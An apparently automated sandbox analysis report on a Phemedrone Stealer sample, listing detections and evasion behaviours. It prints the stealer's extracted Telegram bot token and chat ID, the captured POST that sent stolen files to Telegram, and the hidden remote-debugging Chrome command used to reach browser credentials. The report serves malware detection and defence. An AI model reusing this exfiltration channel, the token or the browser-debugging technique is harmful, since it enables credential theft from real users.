Edit tour

Windows Analysis Report
R9rwNLVzpr.exe

Overview

General Information

Sample name:	R9rwNLVzpr.exe renamed because original name is a hash value
Original sample name:	02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683.exe
Analysis ID:	1635501
MD5:	16e8183843e73d742ee2f2d334b8c6c0
SHA1:	5167fa0c1f5771e2a24aab9c25633e81bbdae157
SHA256:	02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
Infos:

Detection

Phemedrone Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Generic Stealer

Yara detected Phemedrone Stealer

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

R9rwNLVzpr.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\R9rwNLVzpr.exe" MD5: 16E8183843E73D742EE2F2D334B8C6C0)

chrome.exe (PID: 6928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2108 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 9136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4856 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

WerFault.exe (PID: 1600 cmdline: C:\Windows\system32\WerFault.exe -u -p 7924 -s 2604 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Configuration

Threatname: Phemedrone Stealer

{"Telegram Token": "7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0", "Telegram Chatid": "-1002313196419", "Botnet": "Default", "Tag": "Tivotop", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n  <Exponent>AQAB</Exponent>\r\n  <Modulus>3hKUhpIKVmqE0h1AIb1nCB3/2Bmmrhk1PC7iKGwI8xRrhVuVxO0XJJ1kDguXo2XKcRHd9y3i4k19Zisq0jz2Uiodm8KshFwaS8639uOUzxhJ0dbx23Hwj0rde0STXQIGetDigB0akhWaq5PKeKyHdkmBbcqZFktc279f9QzuJLU=</Modulus>\r\n</RSAParameters>"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1584357920.0000000003868000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000001.00000002.1584357920.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Process Memory Space: R9rwNLVzpr.exe PID: 7924	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Process Memory Space: R9rwNLVzpr.exe PID: 7924	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\R9rwNLVzpr.exe", ParentImage: C:\Users\user\Desktop\R9rwNLVzpr.exe, ParentProcessId: 7924, ParentProcessName: R9rwNLVzpr.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 6928, ProcessName: chrome.exe

Suricata Signatures

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T18:11:37.400867+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49727	149.154.167.220	443	TCP

Joe Security MALWARE Phemedrone - Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T18:11:37.401783+0100	1800010	1	A Network Trojan was detected	192.168.2.5	49727	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: R9rwNLVzpr.exe

Avira: detected

Found malware configuration

Source: R9rwNLVzpr.exe

Malware Configuration Extractor: Phemedrone Stealer {"Telegram Token": "7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0", "Telegram Chatid": "-1002313196419", "Botnet": "Default", "Tag": "Tivotop", "RSA Key": "<?xml version=\"1.0\" ?>\r\n<RSAParameters xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <Exponent>AQAB</Exponent>\r\n <Modulus>3hKUhpIKVmqE0h1AIb1nCB3/2Bmmrhk1PC7iKGwI8xRrhVuVxO0XJJ1kDguXo2XKcRHd9y3i4k19Zisq0jz2Uiodm8KshFwaS8639uOUzxhJ0dbx23Hwj0rde0STXQIGetDigB0akhWaq5PKeKyHdkmBbcqZFktc279f9QzuJLU=</Modulus>\r\n</RSAParameters>"}

Multi AV Scanner detection for submitted file

Source: R9rwNLVzpr.exe	ReversingLabs: Detection: 83%
Source: R9rwNLVzpr.exe	Virustotal: Detection: 79%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: R9rwNLVzpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdbW source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERF92.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: R9rwNLVzpr.exe, 00000001.00000002.1591776135.000000001C84F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbpo+ source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbSP source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: indoC:\Windows\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbNT source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF92.tmp.dmp.16.dr
Source:	Binary string: C:\Users\user\Desktop\R9rwNLVzpr.PDB= source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.pdba source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1592513828.000000001C974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\R9rwNLVzpr.PDBl source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdbLa source: R9rwNLVzpr.exe, 00000001.00000002.1592513828.000000001C974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R9rwNLVzpr.PDB source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\R9rwNLVzpr.PDBh source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1590911722.000000001C08A000.00000004.00000020.00020000.00000000.sdmp, R9rwNLVzpr.exe, 00000001.00000002.1591776135.000000001C84F000.00000004.00000020.00020000.00000000.sdmp, WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdbIL source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\Desktop\R9rwNLVzpr.PDB source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdbE = source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbPo source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 33MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1800010 - Severity 1 - Joe Security MALWARE Phemedrone - Telegram Exfil : 192.168.2.5:49727 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.1.100 104.26.1.100

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.5:49725 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive

Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000003.1325308442.000017D401570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000006.00000003.1325308442.000017D401570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473108902.000017D401308000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1447886253.000017D4008D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1472912058.000017D401288000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1472799030.000017D401244000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000006.00000002.1473659400.000017D401438000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd609e3f740105Host: api.telegram.orgContent-Length: 747123Expect: 100-continueConnection: Keep-Alive

Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000006.00000002.1449034116.000017D4009B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 00000006.00000002.1449265762.000017D400A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1448840253.000017D400958000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1447754360.000017D4008BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 00000006.00000002.1472092769.000017D4010BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1324930257.000017D4010BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 00000006.00000002.1442757747.000017D4000A9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: R9rwNLVzpr.exe, 00000001.00000002.1593415189.000000001E180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.a.0/sTyF
Source: R9rwNLVzpr.exe, 00000001.00000002.1593415189.000000001E180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.hotoshQ
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: chrome.exe, 00000006.00000002.1458270403.000017D400DCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: Amcache.hve.16.dr	String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000006.00000002.1398486061.0000025705D16000.00000002.00000001.00040000.0000000E.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: R9rwNLVzpr.exe, 00000001.00000002.1584357920.000000000386A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: chrome.exe, 00000006.00000002.1461564252.000017D400E14000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://a-mo.net
Source: chrome.exe, 00000006.00000002.1458369665.000017D400DE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000006.00000002.1442607211.000017D400044000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000006.00000002.1445612446.000017D400740000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000006.00000002.1443610535.000017D400223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000006.00000002.1451644719.000017D400C4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000006.00000002.1451644719.000017D400C4C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowserlt
